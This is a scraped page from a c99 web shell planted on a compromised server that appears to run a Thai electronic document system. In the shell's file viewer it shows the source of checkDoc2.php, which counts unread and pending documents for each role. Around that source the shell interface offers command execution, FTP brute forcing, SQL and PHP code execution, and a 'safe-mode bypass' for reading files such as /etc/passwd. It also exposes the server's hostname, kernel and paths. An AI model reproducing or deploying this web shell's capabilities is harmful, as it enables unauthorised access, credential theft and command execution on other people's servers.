!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     checkDoc2.php (13.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
	include_once("../../class/clsConnection.php");
	include_once("../../class/clsDB.php");
	include_once "../global.php";
	include_once "../class/clsDocReceiveSend.php";
	include_once "../class/clsDocuments.php";
	include_once "../class/clsDepartment.php";
	include_once "../class/clsDocLinePosition.php";
	include_once "../class/clsDocLineConfig.php";
	include_once "../class/clsUmuser.php";	
	include_once "../class/clsUmUserGroup.php";
	include_once "../link/keyThai.php";
	include_once "../class/clsDocForSign.php";
	
	$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);
	$oRs = new DocReceiveSend($oC);
	$oRs2 = new DocReceiveSend($oC);
	$oDoc = new Documents($oC);
	$oDoc2 = new Documents($oC);
	$oDoc3 = new Documents($oC);
	$oDP = new Department($oC);
	$oDlp = new docLinePosition($oC);
	$oDlp2 = new docLinePosition($oC);
	$oDlp3 = new docLinePosition($oC);
	$oDlp4 = new docLinePosition($oC);
	$oDlc = new docLineConfig($oC);
	$oDlc1 = new docLineConfig($oC);
	$oDlc2 = new docLineConfig($oC);
	$oDlc3 = new docLineConfig($oC);
	$oDlp1 = new docLinePosition($oC);
	$oUs = new umuser($oC);
	$oUg = new umusergroup($oC);
	$Maxgroup=$oDP->SearchMaxDocGroup();
	$oDfs = new DocForSign($oC);
	
	$oUs->SearchUsIDByUsPsCode($personId,$GLOBALS['DBNAME_UMS']);
	$oUs->GetRecord();   //---find  -> $oUs->UsID;
?>
<? 
	$showpage="";
//-------------------------------person----------------------------------------------------------------------
	$i=0;
	$i = $oRs2->SearchCountBypersonIdDocGroupDsID0($personId,$Maxgroup); 
			if($i!="0"){
				$showpage="<font color=#FF8800 size=2>ผู้ใช้ทั่วไป</font><br>&nbsp;&nbsp; มีรายการหนังสือเข้าที่ยังไม่ได้เปิดอ่าน&nbsp;".$i."&nbsp;รายการ<br>";
			}
	
	
	$oUg->RSgroupByUgUsID($oUs->UsID,$GLOBALS['DBNAME_UMS'],'UgGpID ');
	while($oUg->GetRecord()){

	//------------------------------staff sarabun----------------------------------------------------------------
	if($oUg->UgGpID=="107"){ 
			$oDlp->SearchByGpID(107);
			while($oDlp->GetRecord()){
					$group1=0;
					$oDlc->SearchByPsPositionDlpIDActiveY($personId,$oDlp->DlpID,$Maxgroup);
					while($oDlc->GetRecord()){
								
								//$oDlp1->SearchByKey($oDlc->DlpID);
								//$oDlp1->GetRecord();
								$oDP->SearchByKey($oDlc->deptId);
								$oDP->GetRecord(); 
		
								//$oDlc2->SearchByKey($oDlc->DlcID); $oDlc2->GetRecord(); 
								//$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
								if($oDlp->DlpPID!="0"){ 
									$DlcPS2=$oDlc3->SearchDlc2($oDlc->DlcSeq,$oDlp->DlpPID,$oDlc->deptId);
								 }else{
									$DlcPS2=$oDlc3->SearchDlc2($oDlc->DlcSeq,$oDlp->DlpPID,$oDlc->deptId);
								}
								$i=0;
								$i = $oDoc->SearchCountDocIDByDlcIDDocGroupPSDlcID2DsID0DrsSendDate($oDlc->DlcID,$Maxgroup,$DlcPS2);
										if($group1=="0" && $i!=0){
													$showpage.="<font color=#FF8800 size=2>เจ้าหน้าที่สารบรรณ</font><br>";
													$group1++;
										}
										if($i!="0"){
													$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
													$showpage.="&nbsp;&nbsp; มีรายการหนังสือเข้า&nbsp;".$i."&nbsp;รายการ<br>";
										}
															
								$j=0;
								$j = $oRs->SearchCountDrsIDByDlcIDDocGroupDrsSendBackDrsSendBackDlcID($oDlc->DlcID,$Maxgroup,$DlcPS2);
										if($group1=="0"  && $j!=0){
														$showpage.="<font color=#FF8800 size=2>เจ้าหน้าที่สารบรรณ</font><br>";
														$group1++;	
										}
										if($j!="0"){
														if($i==0){
															$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
														}
															$showpage.="&nbsp;&nbsp; มีรายการหนังสือแจ้งการส่งผิด&nbsp;".$j."&nbsp;รายการ<br>";
										}
								
								$k=0;	
								$k = $oDoc3->SearchCountDocIDByDlcIDDocGroupPSDlcID2DsID3DrsSendDateDrsSEndnotY2($oDlc->DlcID,$Maxgroup,$DlcPS2,$oDlc->DlcID);
										if($group1=="0" && $k!=0){ 
														$showpage.="<font color=#FF8800 size=2>เจ้าหน้าที่สารบรรณ</font><br>";
														$group1++;
										}
										if($k!="0"){
														if($i==0 && $j==0){
															$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
														}
															$showpage.="&nbsp;&nbsp; มีรายการหนังสือลงนามแล้วรอส่ง&nbsp;".$k."&nbsp;รายการ<br>";
										}
										
								$m=0;	
								$m= $oDfs->SearchDlcIDstatusNoGetNum($oDlc->DlcID,$Maxgroup,$DlcPS2);
										if($group1=="0" && $m!=0){ 
														$showpage.="<font color=#FF8800 size=2>เจ้าหน้าที่สารบรรณ</font><br>";
														$group1++;
										}
										if($m!="0"){
														if($i==0 && $j==0 && $k==0){
															$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
														}
															$showpage.="&nbsp;&nbsp; มีรายการหนังสือเสนอลงนามแล้วรอรับหนังสือ&nbsp;".$m."&nbsp;รายการ<br>";
										}															
					}
			}
	} //--umusergroup
	//------------------------------head sarabun----------------------------------------------------------------
	if($oUg->UgGpID=="110"){
			$oDlp2->SearchByGpID(110);
			while($oDlp2->GetRecord()){
					$group2=0;
					$oDlc2->SearchByPsPositionDlpIDActiveY($personId,$oDlp2->DlpID,$Maxgroup);
					while($oDlc2->GetRecord()){
								//$oDlp1->SearchByKey($oDlc2->DlpID);
								//$oDlp1->GetRecord();
								$oDP->SearchByKey($oDlc2->deptId);
								$oDP->GetRecord(); 
								
										//$oDlc->SearchByKey($oDlc2->DlcID); $oDlc->GetRecord();
										//$oDlp2->SearchByKey($oDlc2->DlpID);  $oDlp2->GetRecord();
										if($oDlp2->DlpPID!="0"){ 
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp2->DlpPID,$oDlc2->deptId);
										}else{
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp2->DlpPID,$oDlc2->deptId);
										}
										$i=0;
										$i = $oDoc->SearchCountDocIDByDocGroupDsID2DocIDDlcIDDrsReceiveDlcID2Status2($Maxgroup,$oDlc2->DlcID,$DlcPS2);
												if($group2=="0" && $i!=0){ 
																$showpage.="<font color=#FF8800 size=2>หัวหน้าสารบรรณ</font><br>";
																$group2++;
												}	
												if($i!="0"){
																$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp2->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																$showpage.="&nbsp;&nbsp; มีรายการหนังสือที่ยังไม่ได้ลงนาม&nbsp;".$i."&nbsp;รายการ<br>";
												}
										
										$j=0;
										$j = $oRs->SearchCountDrsIDByDlcIDDocGroupDrsSendBackDrsSendBackDlcID($oDlc2->DlcID,$Maxgroup,$DlcPS2);
												if($group2=="0" && $j!=0){ 
																$showpage.="<font color=#FF8800 size=2>หัวหน้าสารบรรณ</font><br>";
																$group2++;
												}
												if($j!="0"){
																if($i==0){
																	$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp2->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																}
																	$showpage.="&nbsp;&nbsp; มีรายการหนังสือแจ้งการส่งผิด&nbsp;".$j."&nbsp;รายการ<br>";
												}										
					}
			}
	} //--umusergroup
	
	//------------------------------head in dept----------------------------------------------------------------
	if($oUg->UgGpID=="111"){
			$oDlp3->SearchByGpID(111);
			while($oDlp3->GetRecord()){
					$group3=0;
					$oDlc2->SearchByPsPositionDlpIDActiveY($personId,$oDlp3->DlpID,$Maxgroup);
					while($oDlc2->GetRecord()){
								//$oDlp1->SearchByKey($oDlc2->DlpID);
								//$oDlp1->GetRecord();
								$oDP->SearchByKey($oDlc2->deptId);
								$oDP->GetRecord(); 
								
										//$oDlc->SearchByKey($oDlc2->DlcID); $oDlc->GetRecord();
										//$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
										if($oDlp3->DlpPID!="0"){ 
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp3->DlpPID,$oDlc2->deptId);
										}else{
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp3->DlpPID,$oDlc2->deptId);
										}
										$i=0;
										$i = $oDoc->SearchCountDocIDByDocGroupDsID2DocIDDlcIDDrsReceiveDlcID2Status2($Maxgroup,$oDlc2->DlcID,$DlcPS2);
												if($group3=="0" && $i!=0){ 
																$showpage.="<font color=#FF8800 size=2>หัวหน้าหน่วยงาน</font><br>";
																$group3++;
												}
												if($i!="0"){
																$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp3->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																$showpage.="&nbsp;&nbsp; มีรายการหนังสือที่ยังไม่ได้ลงนาม&nbsp;".$i."&nbsp;รายการ<br>";
												}
		
										$j=0;
										$j = $oRs->SearchCountDrsIDByDlcIDDocGroupDrsSendBackDrsSendBackDlcID($oDlc2->DlcID,$Maxgroup,$DlcPS2);
												if($group3=="0" && $j!=0){ 
																$showpage.="<font color=#FF8800 size=2>หัวหน้าหน่วยงาน</font><br>";
																$group3++;
												}
												if($j!="0"){
																if($i==0){
																	$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp3->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																}
																	$showpage.="&nbsp;&nbsp; มีรายการหนังสือแจ้งการส่งผิด&nbsp;".$j."&nbsp;รายการ<br>";
												}								
										
										
										
					}
			}
	} //--umusergroup
	
//------------------------------header----------------------------------------------------------------
	if($oUg->UgGpID=="112"){
			$oDlp4->SearchByGpID(112);
			while($oDlp4->GetRecord()){
					$group4=0;
					$oDlc2->SearchByPsPositionDlpIDActiveY($personId,$oDlp4->DlpID,$Maxgroup);
					while($oDlc2->GetRecord()){
								//$oDlp1->SearchByKey($oDlc2->DlpID);
								//$oDlp1->GetRecord();
								$oDP->SearchByKey($oDlc2->deptId);
								$oDP->GetRecord(); 
								
										//$oDlc->SearchByKey($oDlc2->DlcID); $oDlc->GetRecord();
										//$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
										if($oDlp4->DlpPID!="0"){ 
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp4->DlpPID,$oDlc2->deptId);
										}else{
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp4->DlpPID,$oDlc2->deptId);
										}
										$i=0;
										$i= $oDoc->SearchCountDocIDByDocGroupDsID2DocIDDlcIDDrsReceiveDlcID2Status2($Maxgroup,$oDlc2->DlcID,$DlcPS2);
												if($group4=="0" && $i!=0){ 
																$showpage.="<font color=#FF8800 size=2>ผู้อำนวยการ</font><br>";
																$group4++;
												}								
												if($i!="0"){
																$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp4->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																$showpage.="&nbsp;&nbsp; มีรายการหนังสือที่ยังไม่ได้ลงนาม&nbsp;".$i."&nbsp;รายการ<br>";
												}
												
										$j=0;
										$j= $oRs->SearchCountDrsIDByDlcIDDocGroupDrsSendBackDrsSendBackDlcID($oDlc2->DlcID,$Maxgroup,$DlcPS2);
												if($group4=="0" && $j!=0){ 
																$showpage.="<font color=#FF8800 size=2>ผู้อำนวยการ</font><br>";
																$group4++;
												}
												if($j!="0"){
																if($i==0){
																	$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp4->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																}
																	$showpage.="&nbsp;&nbsp; มีรายการหนังสือแจ้งการส่งผิด&nbsp;".$j."&nbsp;รายการ<br>";
												}								
										
					}
			}
	} //--umusergroup
	
		//------------------------------head----------------------------------------------------------------
	if($oUg->UgGpID=="115"){
			$oDlp3->SearchByGpID(115);
			while($oDlp3->GetRecord()){
					$group5=0;
					$oDlc2->SearchByPsPositionDlpIDActiveY($personId,$oDlp3->DlpID,$Maxgroup);
					while($oDlc2->GetRecord()){
								//$oDlp1->SearchByKey($oDlc2->DlpID);
								//$oDlp1->GetRecord();
								$oDP->SearchByKey($oDlc2->deptId);
								$oDP->GetRecord(); 
								
										//$oDlc->SearchByKey($oDlc2->DlcID); $oDlc->GetRecord();
										//$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
										if($oDlp3->DlpPID!="0"){ 
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp3->DlpPID,$oDlc2->deptId);
										}else{
											$DlcPS2=$oDlc3->SearchDlc2($oDlc2->DlcSeq,$oDlp3->DlpPID,$oDlc2->deptId);
										}
										$i=0;
										$i= $oDoc->SearchCountDocIDByDocGroupDsID2DocIDDlcIDDrsReceiveDlcID2Status2($Maxgroup,$oDlc2->DlcID,$DlcPS2);
												if($group5=="0"  && $i!=0){ 
																$showpage.="<font color=#FF8800 size=2>รองผู้อำนวยการ</font><br>";
																$group5++;
												}
												if($i!="0"){
																$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp3->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																$showpage.="&nbsp;&nbsp; มีรายการหนังสือที่ยังไม่ได้ลงนาม&nbsp;".$i."&nbsp;รายการ<br>";
												}
										
										$j=0;
										$j= $oRs->SearchCountDrsIDByDlcIDDocGroupDrsSendBackDrsSendBackDlcID($oDlc2->DlcID,$Maxgroup,$DlcPS2);
												if($group5=="0"  && $j!=0){ 
																$showpage.="<font color=#FF8800 size=2>รองผู้อำนวยการ</font><br>";
																$group5++;
												}
												if($j!="0"){
																if($i==0){
																	$showpage.="&nbsp;&nbsp;&nbsp;- ".$oDlp3->DlpName."&nbsp;"."(".$oDP->deptName.")<br>";
																}
																	$showpage.="&nbsp;&nbsp; มีรายการหนังสือแจ้งการส่งผิด&nbsp;".$j."&nbsp;รายการ<br>";
												}								
										
										
					}
			}
	} //--umusergroup
	
	}  //end while umusergroup

	if($showpage!=""){
		echo "<font size=\"3\" color=\"#0000FF\"><b>ระบบสารบรรณอิเล็กทรอนิกส์</b></font><br>".$showpage;
	}else{
		echo $showpage;
	}
	
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--